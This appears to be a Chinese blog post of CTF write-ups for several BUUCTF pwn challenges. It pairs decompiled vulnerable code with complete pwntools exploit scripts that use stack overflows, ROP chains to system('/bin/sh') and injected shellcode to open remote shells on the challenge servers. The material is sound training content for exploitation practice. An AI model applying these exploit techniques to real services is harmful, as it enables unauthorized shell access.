BUUCTF pwn wp 16 - 20

最新推荐文章于 2024-06-03 20:28:40 发布
最新推荐文章于 2024-06-03 20:28:40 发布
阅读量502 收藏 1
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33976344/article/details/119890265
版权

[HarekazeCTF2019]baby_rop

在这里插入图片描述

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[16]; // [rsp+0h] [rbp-10h] BYREF

  system("echo -n \"What's your name? \"");
  __isoc99_scanf("%s", v4);
  printf("Welcome to the Pwn World, %s!\n", v4);
  return 0;
}

直接溢出stack
在这里插入图片描述

在这里插入图片描述

from pwn import *

url, port = "node4.buuoj.cn", 26017
filename = "./babyrop"
elf = ELF(filename)
# libc = ELF("")

debug = 0
if debug:
    context.log_level="debug"
    io = process(filename)
    # context.terminal = ['tmux', 'splitw', '-h']
    # gdb.attach(io)
else:
    io = remote(url, port)

binsh_addr = 0x0000000000601048
pop_rdi_addr = 0x0000000000400683
ret_addr = 0x0000000000400479
system_addr = elf.sym['system']
payload = cyclic(0x18) + p64(ret_addr) + p64(pop_rdi_addr) 
payload += p64(binsh_addr) + p64(system_addr)   
io.sendlineafter("name? ", payload)
io.interactive()

根目录没有flag, 用命令搜索
find . -name "flag"

在这里插入图片描述

jarvisoj_level2_x64

做过了, 直接贴链接https://blog.csdn.net/qq_33976344/article/details/118303938

from pwn import *
from pwnlib.util.cyclic import cyclic

sel = 1
filename = "./level2_x64"
URL, PORT = "node4.buuoj.cn", 28027
io = process(filename) if sel == 0 else remote(URL, PORT)

elf = ELF(filename)
sys_addr = elf.symbols['system']
binsh_addr = next(elf.search(b"/bin/sh"))
pop_rdi_addr = 0x00000000004006b3

payload = cyclic(0x80 + 8) + p64(pop_rdi_addr) + p64(binsh_addr) + p64(sys_addr)

io.sendlineafter("Input:\n", payload)
io.interactive()

ciscn_2019_n_5

在这里插入图片描述

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char text[30]; // [rsp+0h] [rbp-20h] BYREF

  setvbuf(stdout, 0LL, 2, 0LL);
  puts("tell me your name");
  read(0, name, 0x64uLL);
  puts("wow~ nice name!");
  puts("What do you want to say to me?");
  gets(text);
  return 0;
}

给name传入shellcode, 然后text溢出到shellcode

from pwn import *

url, port = "node4.buuoj.cn", 29847
filename = "./ciscn_2019_n_5"
elf = ELF(filename)
# libc = ELF("")

context.arch = 'amd64'
debug = 0
if debug:
    context.log_level="debug"
    io = process(filename)
    # context.terminal = ['tmux', 'splitw', '-h']
    # gdb.attach(io)
else:
    io = remote(url, port)

shellcode_addr = 0x0000000000601080
payload = cyclic(0x28) + p64(shellcode_addr)
shellcode = asm(shellcraft.sh())
io.sendlineafter("tell me your name\n", shellcode)
io.sendlineafter("say to me?\n", payload)
io.interactive()

others_shellcode

在这里插入图片描述
在这里插入图片描述

ciscn_2019_ne_5

在这里插入图片描述

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int result; // eax
  int v4; // [esp+0h] [ebp-100h] BYREF
  char src[4]; // [esp+4h] [ebp-FCh] BYREF
  char v6[124]; // [esp+8h] [ebp-F8h] BYREF
  char s1[4]; // [esp+84h] [ebp-7Ch] BYREF
  char v8[96]; // [esp+88h] [ebp-78h] BYREF
  int *v9; // [esp+F4h] [ebp-Ch]

  v9 = &argc;
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  fflush(stdout);
  *(_DWORD *)s1 = 48;
  memset(v8, 0, sizeof(v8));
  *(_DWORD *)src = 48;
  memset(v6, 0, sizeof(v6));
  puts("Welcome to use LFS.");
  printf("Please input admin password:");
  __isoc99_scanf("%100s", s1);
  if ( strcmp(s1, "administrator") )
  {
    puts("Password Error!");
    exit(0);
  }
  puts("Welcome!");
  puts("Input your operation:");
  puts("1.Add a log.");
  puts("2.Display all logs.");
  puts("3.Print all logs.");
  printf("0.Exit\n:");
  __isoc99_scanf("%d", &v4);
  switch ( v4 )
  {
    case 0:
      exit(0);
      return result;
    case 1:
      AddLog(src);
      result = sub_804892B(argc, argv, envp);
      break;
    case 2:
      Display(src);
      result = sub_804892B(argc, argv, envp);
      break;
    case 3:
      Print();
      result = sub_804892B(argc, argv, envp);
      break;
    case 4:
      GetFlag(src);
      result = sub_804892B(argc, argv, envp);
      break;
    default:
      result = sub_804892B(argc, argv, envp);
      break;
  }
  return result;
}

int __cdecl AddLog(int a1)
{
  printf("Please input new log info:");
  return __isoc99_scanf("%128s", a1);
}

int __cdecl GetFlag(char *src)
{
  char dest[4]; // [esp+0h] [ebp-48h] BYREF
  char v3[60]; // [esp+4h] [ebp-44h] BYREF

  *(_DWORD *)dest = 48;
  memset(v3, 0, sizeof(v3));
  strcpy(dest, src);
  return printf("The flag is your log:%s\n", dest);
}

栈溢出, addlog之后进功能4, 劫持getflag函数到system(“sh”)
在这里插入图片描述

from pwn import *

url, port = "node4.buuoj.cn", 26296
filename = "./ciscn_2019_ne_5"
elf = ELF(filename)
# libc = ELF("")

debug = 0
if debug:
    context.log_level="debug"
    io = process(filename)
    # context.terminal = ['tmux', 'splitw', '-h']
    # gdb.attach(io)
else:
    io = remote(url, port)

sh_addr = 0x080482ea
system_addr = elf.plt['system']
payload = cyclic(0x48 + 4) + p32(system_addr) + cyclic(4) + p32(sh_addr)

io.sendlineafter("password:", "administrator")
io.sendlineafter(":", "1")
io.sendlineafter(":", payload)
io.sendlineafter(":", "4")
io.interactive()

总结

没啥好说的, 这几题比较简单

fa1c4
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界REVERSE新手题解答
liucc09的博客
11-25 931
csaw2013reversing2 程序分析 使用IDA打开程序,F5键利用HexRay工具生成可读代码如下: int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { int v3; // ecx CHAR *lpMem; // [esp+8h] [ebp-Ch] HANDLE hHeap; // [esp+10h] [ebp-4h] hHeap = HeapCreate(0x40000u
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
CTFshow-pwn入门-前置基础pwn13-pwn19
T1ngSh0w的博客
06-17 1883
ctfshow pwn入门-前置基础pwn13-pwn19
[Litctf 2024] Pwn WP 全部题目
最新发布
红叶的博客
06-03 790
劫持 __malloc_hook 打 one_gadget。使用 realloc 调整栈帧。
CTF(PWN基础笔记)
WuXianYo_的博客
03-17 223
8)完成计算后,执行pop ebp,因被调函数(子函数)不存在局部变量,所以在最后espebp在同一个指向上,不需要leave指令移动espebp(若存在局部变量,则espebp不在同一点,因为需要留出栈空间存放变量),pop ebpesp指向的父函数的原先的ebp值存入ebp中,所以ebp会回到原先指向的位置,esp再自动抬高一个字长,最后执行return指令,将下方的esp再抬高一个字长,并将esp原来指向的值存入esp中。6)执行mov,将esp的值赋给sbp,把ebp抬到新的栈底.
[SECCON CTF 2022] 只两个小题pwn_koncha,rev_babycmp,crypto_pqpq
weixin_52640415的博客
11-14 896
SECCON CTF 2022
攻防世界hello pwn WPpwn入门基础题)
m0_62584974的博客
11-21 2038
攻防世界hello pwn WPpwn入门基础题)的简单讲解
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
2021祥云杯 CTF pwnwp
qq_39948058的博客
08-26 1162
前言:题都不难,我好气,这次被大佬带飞,队里的pwn手都是神级别的,这里出了三道题,如果我不是sha,我应该能出五道,可是我好菜,这里贴出一下 note: 思路:自己构建格式化字符串漏洞,自己打,先打IO——stdout,泄露libc基地址,再打的是reallochook为onegadget,然后进行申请获取rce exp: #coding:utf-8 from pwn import * context.log_level = "debug" p = process("./note") libc =
DSCTF pwn 部分wp
N1rvana的博客
07-15 631
DSCTF pwn wp
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 396
buuctf-pwn 001-016wp
BUUCTFPWN】ciscn_2019_ne_5
m0_55368674的博客
01-15 170
BUUCTFPWN】ciscn_2019_ne_5
攻防世界pwn之新手练习区
bahuishi9641的博客
07-30 1425
0x00 get_shell 题目描述:运行就能拿到shell呢,真的 from pwn import * io = remote('111.198.29.45','36389') io.interactive() 0x01 CGfsb 题目描述:菜鸡面对着pringf发愁,他不知道prinf除了输出还有什么作用 1.基本信息: Arch: i386-32-little ...
BUUCTF PWN方向 1-6题 详解wp
qq_62564422的博客
02-06 1394
构造payload:变量声明后顺序入栈,每个标识表示变量所占栈空间底部,s为输入的变量,则其需要覆盖的长度为0X3C~0X00(0X3C字节),0X00处表示返回地址值(4字节)需要覆盖;返回地址的数据(8字节)(被垃圾数 据覆盖后则改为访问之后地址)+(返回地址 地址数+1)(远程端使用了ubuntu18,ubuntu18以上版本调用64位程序中的system函数需要栈对齐,在执行system时有一个指令需要栈对齐 ,所以地址+1)而且这个空间是连续的,v1之后就是v2,他们的内存块是接在一起的。
攻防世界逆向新手区
Tiany的博客
09-18 2903
攻防世界逆向新手区,有错请指出
BUUCTF PWN部分题目wp
awxnutpgs545144602的博客
08-16 2004
pwn好难啊 PWN 1,连上就有flag的pwnnc buuoj.cn 6000得到flag 2,RIP覆盖一下用ida分析一下,发现已有了system,只需覆盖RIP为fun()的地址,用peda计算偏移为23,写脚本 from pwn import* sh=remote('f.b...
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值